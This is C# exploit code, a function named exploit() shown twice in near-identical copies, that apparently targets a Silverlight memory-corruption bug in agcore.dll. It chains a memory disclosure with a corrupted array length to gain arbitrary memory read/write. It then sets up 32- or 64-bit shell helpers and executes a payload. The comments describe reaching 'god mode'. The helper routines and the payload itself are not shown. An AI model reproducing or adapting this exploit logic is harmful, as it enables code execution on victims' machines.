void exploit() { try { LogAdd("------------ START ------------"); // prepare pointer for ScriptObject.Initialize() ulong h = MemoryDiscl(); LogAdd("handle = " + Hex(h)); if (h == 0) { throw new Exception("Something is wrong with the memory disclosure"); } // save old length int oldLen = buf.Length; LogAdd("buf.Length = " + Hex(oldLen)); // call ScriptObject.Initialize() and cause the buf.Length corruption MyObject mo = new MyObject(); mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h) // check results int len = buf.Length; LogAdd("buf.Length = " + Hex(len)); if (len == oldLen) { throw new Exception("Something is wrong with buf.Length"); } // ok, now we have an uint[] array with Length > 0x40000000, so we can read/write arbitrary memory addresses on x32, // but this is not allways enough for x64. So for 64-bit we have to use different technique to gain the true "god mode". ShellHelper32 sh; if (is64) { sh = new ShellHelper64(); sh.SetPayload(payload); } else { sh = new ShellHelper32(); sh.SetPayload(payload); } // execute payload sh.Exec(oldLen); LogAdd("------------ END ------------"); } catch (Exception ex) { LogAdd("Error: " + ex.ToString()); } }
void exploit() { try { LogAdd("------------ START ------------"); // prepare pointer for ScriptObject.Initialize() ulong h = MemoryDiscl(); LogAdd("handle = " + Hex(h)); if (h == 0) throw new Exception("Something is wrong with the memory disclosure"); // save old length int oldLen = buf.Length; LogAdd("buf.Length = " + Hex(oldLen)); // call ScriptObject.Initialize() and cause the buf.Length corruption MyObject mo = new MyObject(); mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h) // check results int len = buf.Length; LogAdd("buf.Length = " + Hex(len)); if (len == oldLen) throw new Exception("Something is wrong with buf.Length"); // ok, now we have an uint[] array with Length > 0x40000000, so we can read/write arbitrary memory addresses on x32, // but this is not allways enough for x64. So for 64-bit we have to use different technique to gain the true "god mode". ShellHelper32 sh; if (is64) { sh = new ShellHelper64(); sh.SetPayload(payload); } else { sh = new ShellHelper32(); sh.SetPayload(payload); } // execute payload sh.Exec(oldLen); LogAdd("------------ END ------------"); } catch (Exception ex) { LogAdd("Error: " + ex.ToString()); } }